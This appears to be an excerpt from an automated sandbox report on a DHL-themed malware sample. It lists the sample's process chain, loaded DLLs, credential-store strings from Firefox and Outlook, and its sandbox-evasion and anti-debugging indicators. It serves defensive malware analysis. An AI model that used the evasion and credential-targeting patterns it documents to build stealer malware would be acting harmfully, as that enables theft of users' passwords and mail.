                Source: net.exe, 00000007.00000002.3517458773.0000000000712000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000007.00000003.2307724920.0000000000712000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: DHL_IMPORT_8236820594.exe | ReversingLabs: Detection: 63%
                Source: unknown | Process created: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe "C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe"
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe"
                Source: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exe | Process created: C:\Windows\SysWOW64\wusa.exe "C:\Windows\SysWOW64\wusa.exe"
                Source: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\SysWOW64\net.exe"
                Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe | Section loaded: wsock32.dll
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe | Section loaded: version.dll
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe | Section loaded: winmm.dll
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe | Section loaded: mpr.dll
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe | Section loaded: wininet.dll
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe | Section loaded: iphlpapi.dll
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe | Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe | Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe | Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: mpr.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: wkscli.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: samcli.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: iphlpapi.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: wininet.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: version.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: mlang.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: propsys.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: winsqlite3.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: vaultcli.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: cryptbase.dll
                Source: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exe | Section loaded: wininet.dll
                Source: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exe | Section loaded: mswsock.dll
                Source: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exe | Section loaded: dnsapi.dll
                Source: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exe | Section loaded: iphlpapi.dll
                Source: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exe | Section loaded: fwpuclnt.dll
                Source: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exe | Section loaded: rasadhlp.dll
                Source: C:\Windows\SysWOW64\net.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32
                Source: C:\Windows\SysWOW64\net.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
                Source: DHL_IMPORT_8236820594.exe | Static file information: File size 1632256 > 1048576
                Source: DHL_IMPORT_8236820594.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: DHL_IMPORT_8236820594.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: DHL_IMPORT_8236820594.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: DHL_IMPORT_8236820594.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: DHL_IMPORT_8236820594.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: DHL_IMPORT_8236820594.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: DHL_IMPORT_8236820594.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: wusa.pdbGCTL source: AUHJGnjYgKTjWw.exe, 00000005.00000003.2034581545.0000000000BBB000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: net.pdbUGP source: svchost.exe, 00000002.00000003.2065035000.000000000323B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2064660770.000000000321A000.00000004.00000020.00020000.00000000.sdmp, AUHJGnjYgKTjWw.exe, 00000005.00000002.3517989845.0000000000C68000.00000004.00000001.00020000.00000000.sdmp, AUHJGnjYgKTjWw.exe, 00000005.00000003.2034900857.0000000000C5D000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: wusa.pdb source: AUHJGnjYgKTjWw.exe, 00000005.00000003.2034581545.0000000000BBB000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: AUHJGnjYgKTjWw.exe, 00000005.00000000.2012569159.000000000073E000.00000002.00000001.01000000.00000005.sdmp, AUHJGnjYgKTjWw.exe, 00000009.00000002.3517387666.000000000073E000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: DHL_IMPORT_8236820594.exe, 00000000.00000003.1836622224.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, DHL_IMPORT_8236820594.exe, 00000000.00000003.1840438960.0000000003EB0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2108190018.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2108190018.0000000003900000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1992925679.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1994300850.0000000003700000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000007.00000002.3518629884.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, net.exe, 00000007.00000003.2129162021.0000000002CFE000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000007.00000003.2126611364.0000000002B4F000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000007.00000002.3518629884.000000000304E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: DHL_IMPORT_8236820594.exe, 00000000.00000003.1836622224.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, DHL_IMPORT_8236820594.exe, 00000000.00000003.1840438960.0000000003EB0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.2108190018.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2108190018.0000000003900000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1992925679.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1994300850.0000000003700000.00000004.00000020.00020000.00000000.sdmp, net.exe, net.exe, 00000007.00000002.3518629884.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, net.exe, 00000007.00000003.2129162021.0000000002CFE000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000007.00000003.2126611364.0000000002B4F000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000007.00000002.3518629884.000000000304E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: net.exe, 00000007.00000002.3517458773.0000000000692000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000007.00000002.3519002309.00000000034DC000.00000004.10000000.00040000.00000000.sdmp, AUHJGnjYgKTjWw.exe, 00000009.00000000.2197878687.0000000002B8C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2418472075.000000001FBCC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: net.exe, 00000007.00000002.3517458773.0000000000692000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000007.00000002.3519002309.00000000034DC000.00000004.10000000.00040000.00000000.sdmp, AUHJGnjYgKTjWw.exe, 00000009.00000000.2197878687.0000000002B8C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2418472075.000000001FBCC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: net.pdb source: svchost.exe, 00000002.00000003.2065035000.000000000323B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2064660770.000000000321A000.00000004.00000020.00020000.00000000.sdmp, AUHJGnjYgKTjWw.exe, 00000005.00000002.3517989845.0000000000C68000.00000004.00000001.00020000.00000000.sdmp, AUHJGnjYgKTjWw.exe, 00000005.00000003.2034900857.0000000000C5D000.00000004.00000001.00020000.00000000.sdmp
                Source: DHL_IMPORT_8236820594.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: DHL_IMPORT_8236820594.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: DHL_IMPORT_8236820594.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: DHL_IMPORT_8236820594.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: DHL_IMPORT_8236820594.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe | Code function: 0_2_007D42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe | Code function: 0_2_007F0A76 push ecx; ret 0_2_007F0A89
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00415037 push 00000010h; retf 2_2_0041503D
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004189FB push cs; ret 2_2_00418A05
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004183FA pushfd ; ret 2_2_0041841B
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040EC3C push esp; retf 2_2_0040EC3E
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040BC9A push ebp; iretd 2_2_0040BC9B
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00403530 push eax; ret 2_2_00403532
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040D60D push ds; iretd 2_2_0040D61A
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00411EFC push ecx; iretd 2_2_00411F0D
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00411F5A push ecx; iretd 2_2_00411F0D
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040177A push esp; ret 2_2_0040174E
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040171C push esp; ret 2_2_0040174E
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004017AF push esp; ret 2_2_004017CF
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0390225F pushad ; ret 2_2_039027F9
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039027FA pushad ; ret 2_2_039027F9
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039309AD push ecx; mov dword ptr [esp], ecx 2_2_039309B6
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0390283D push eax; iretd 2_2_03902858
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03901368 push eax; iretd 2_2_03901369
                Source: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exe | Code function: 5_2_03F14B5F push cs; ret 5_2_03F14B69
                Source: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exe | Code function: 5_2_03F1119B push 00000010h; retf 5_2_03F111A1
                Source: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exe | Code function: 5_2_03F0E0BE push ecx; iretd 5_2_03F0E071
                Source: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exe | Code function: 5_2_03F0E060 push ecx; iretd 5_2_03F0E071
                Source: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exe | Code function: 5_2_03F09771 push ds; iretd 5_2_03F0977E
                Source: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exe | Code function: 5_2_03F07DFE push ebp; iretd 5_2_03F07DFF
                Source: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exe | Code function: 5_2_03F0ADA0 push esp; retf 5_2_03F0ADA2
                Source: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exe | Code function: 5_2_03F1455E pushfd ; ret 5_2_03F1457F
                Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02EB225F pushad ; ret 7_2_02EB27F9
                Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02EB27FA pushad ; ret 7_2_02EB27F9
                Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02EB283D push eax; iretd 7_2_02EB2858
                Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02EE09AD push ecx; mov dword ptr [esp], ecx 7_2_02EE09B6
                Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02EB1368 push eax; iretd 7_2_02EB1369

                Persistence and Installation Behavior

                Source: AUHJGnjYgKTjWw.exe, 00000005.00000003.2034581545.0000000000BBB000.00000004.00000001.00020000.00000000.sdmp | Memory string: DWS;zWusaHiddenFailed to allocate and initialize Administrators group SID.WusaIsUserAdminFailed to check token membership.Failed to get message text for id %uWusaLoadMessageWusaMessageBoxFailed: TaskDialog()Failed to get message for error 0x%xWusaGetErrorMessageWusaCreateLockFileFailed to allocate memory for lock file path.Failed to create lock file %SFailed: GetFullPathName() failed for %SWusaGetFullPathNameFailed to allocate memory for full path.Failed to create extract job for location: %SWusaExtractAllFilesFromCabinetFailed to add container for cabinet: %SFailed: ExtractAllFiles()Failed to extract files from cabinet %SFailed: LookupPrivilegeValue()EnablePrivilegeFailed: OpenProcessToken()Failed: AdjustTokenPrivileges()Failed: AdjustTokenPrivileges(); not all token privileges were assignedFailed: GetTokenInformation()WusaGetUserSIDFailed: CopySid()Failed to PostMessage to progress window, error code %uWusaPostMessagewusa.lockFailed to create eventAppModule::InitFailed to initialize COM securityFailed to initialize critical sectionFailed to show welcome dialogFailed to show non administrator dialogUser is not a member of the Administrators group.Failed to show multiple instance dialogError: Another instance of wusa.exe is running.Failed to create sandboxCreated sandbox %lsFailed: AppModule::SetScanCabPath()Failed to get application title text, id %uFailed to allocate BSTR for application titleFailure returned by InitCommonControlsEx()Failure returned by CreateFont()Failed to get STR_EXPAND_START textFailed to get STR_EXPAND_START_UNINSTALL textFailed to get STR_SEARCH_START textFailed to get STR_COPY_START textFailed to get STR_UNINSTALL_START textFailed to set done event to release shutdown blockAppModule::UninitDeleting sandbox %SAppModule::DeleteSandBoxFailed to delete sandboxCommandLineToArgvW() failed.AppModule::ParseCommandLineError: Too few arguments.Failed to get command line length.Failed to allocate memory for ignored arguments.Failed. Restart mode was supplied multiple times30Failed to parse switchFailed. /warnrestart has invalid formatFailed. /kb was supplied multiple timesFailed. /kb has invalid formatKBFailed to prefix KB numberFailed. /log was supplied multiple timesFailed. /gpmode was supplied multiple timesFailed. /gpmode has invalid formatFailed to allocate memory for product codeFailed to set product code to %lsFailed to add an argument to the ignored list Failed to add a blank space to the ignored argument listUnrecognized argument %SFailed to get MSU file nameFailed to get MSU file name or KB numberFailed: /uninstall with /kb and /quiet options is not supportedFailed to show /extract not supported message boxFailed: /extract is not a supported optionCommand line is %lsFailed to get source lengthAppModule::CopyStringWithQuoteFailed to allocate temp buffer"%s"Failed to copy stringFailure returned by SystemParametersInfo()AppModule::CreateFontWFailure returned by CreateFontIndirectW()Failure returned by DeleteObject()Failure r
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe | Code function: 0_2_007EF98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe | Code function: 0_2_00861C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\net.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe | Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe | API/Special instruction interceptor: Address: 3ABD0B4
                Source: C:\Windows\SysWOW64\net.exe | API/Special instruction interceptor: Address: 7FFE2220D324
                Source: C:\Windows\SysWOW64\net.exe | API/Special instruction interceptor: Address: 7FFE2220D7E4
                Source: C:\Windows\SysWOW64\net.exe | API/Special instruction interceptor: Address: 7FFE2220D944
                Source: C:\Windows\SysWOW64\net.exe | API/Special instruction interceptor: Address: 7FFE2220D504
                Source: C:\Windows\SysWOW64\net.exe | API/Special instruction interceptor: Address: 7FFE2220D544
                Source: C:\Windows\SysWOW64\net.exe | API/Special instruction interceptor: Address: 7FFE2220D1E4
                Source: C:\Windows\SysWOW64\net.exe | API/Special instruction interceptor: Address: 7FFE22210154
                Source: C:\Windows\SysWOW64\net.exe | API/Special instruction interceptor: Address: 7FFE2220DA44
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0397096E rdtsc 2_2_0397096E
                Source: C:\Windows\SysWOW64\net.exe | Window / User API: threadDelayed 1393
                Source: C:\Windows\SysWOW64\net.exe | Window / User API: threadDelayed 8579
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe | API coverage: 3.6 %
                Source: C:\Windows\SysWOW64\svchost.exe | API coverage: 0.6 %
                Source: C:\Windows\SysWOW64\net.exe | API coverage: 2.7 %
                Source: C:\Windows\SysWOW64\net.exe TID: 3052 | Thread sleep count: 1393 > 30
                Source: C:\Windows\SysWOW64\net.exe TID: 3052 | Thread sleep time: -2786000s >= -30000s
                Source: C:\Windows\SysWOW64\net.exe TID: 3052 | Thread sleep count: 8579 > 30
                Source: C:\Windows\SysWOW64\net.exe TID: 3052 | Thread sleep time: -17158000s >= -30000s
                Source: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exe TID: 5720 | Thread sleep time: -45000s >= -30000s
                Source: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exe TID: 5720 | Thread sleep time: -33000s >= -30000s
                Source: C:\Windows\SysWOW64\net.exe | Last function: Thread delayed
Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe | Code function: 0_2_008468EE FindFirstFileW,FindClose, 0_2_008468EE
Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe | Code function: 0_2_0084698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime, 0_2_0084698F
Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe | Code function: 0_2_0083D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_0083D076
Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe | Code function: 0_2_0083D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_0083D3A9
Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe | Code function: 0_2_00849642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00849642
Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe | Code function: 0_2_0084979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_0084979D
Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe | Code function: 0_2_0083DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose, 0_2_0083DBBE
Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe | Code function: 0_2_00849B2B FindFirstFileW,Sleep,FindNextFileW,FindClose, 0_2_00849B2B
Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe | Code function: 0_2_00845C97 FindFirstFileW,FindNextFileW,FindClose, 0_2_00845C97
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_0049C980 FindFirstFileW,FindNextFileW,FindClose, 7_2_0049C980
Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe | Code function: 0_2_007D42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_007D42DE
Source: AUHJGnjYgKTjWw.exe, 00000009.00000002.3518020101.0000000000D8F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll;
Source: firefox.exe, 0000000A.00000002.2419741532.0000010C9FACC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll!
Source: net.exe, 00000007.00000002.3517458773.0000000000692000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\SysWOW64\svchost.exe | Process information queried: ProcessInformation
Source: C:\Windows\SysWOW64\svchost.exe | Process queried: DebugPort
Source: C:\Windows\SysWOW64\net.exe | Process queried: DebugPort
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0397096E rdtsc 2_2_0397096E
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00417E73 LdrLoadDll, 2_2_00417E73
Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe | Code function: 0_2_0084EAA2 BlockInput, 0_2_0084EAA2
Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe | Code function: 0_2_00802622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00802622
Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe | Code function: 0_2_007D42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_007D42DE
Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe | Code function: 0_2_007F4CE8 mov eax, dword ptr fs:[00000030h] 0_2_007F4CE8
Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe | Code function: 0_2_03ABD380 mov eax, dword ptr fs:[00000030h] 0_2_03ABD380
Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe | Code function: 0_2_03ABD320 mov eax, dword ptr fs:[00000030h] 0_2_03ABD320
Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe | Code function: 0_2_03ABBD10 mov eax, dword ptr fs:[00000030h] 0_2_03ABBD10
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03928397 mov eax, dword ptr fs:[00000030h] 2_2_03928397
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03928397 mov eax, dword ptr fs:[00000030h] 2_2_03928397
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03928397 mov eax, dword ptr fs:[00000030h] 2_2_03928397
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0392E388 mov eax, dword ptr fs:[00000030h] 2_2_0392E388
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0392E388 mov eax, dword ptr fs:[00000030h] 2_2_0392E388
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0392E388 mov eax, dword ptr fs:[00000030h] 2_2_0392E388
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0395438F mov eax, dword ptr fs:[00000030h] 2_2_0395438F
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0395438F mov eax, dword ptr fs:[00000030h] 2_2_0395438F
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039DE3DB mov eax, dword ptr fs:[00000030h] 2_2_039DE3DB
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039DE3DB mov eax, dword ptr fs:[00000030h] 2_2_039DE3DB
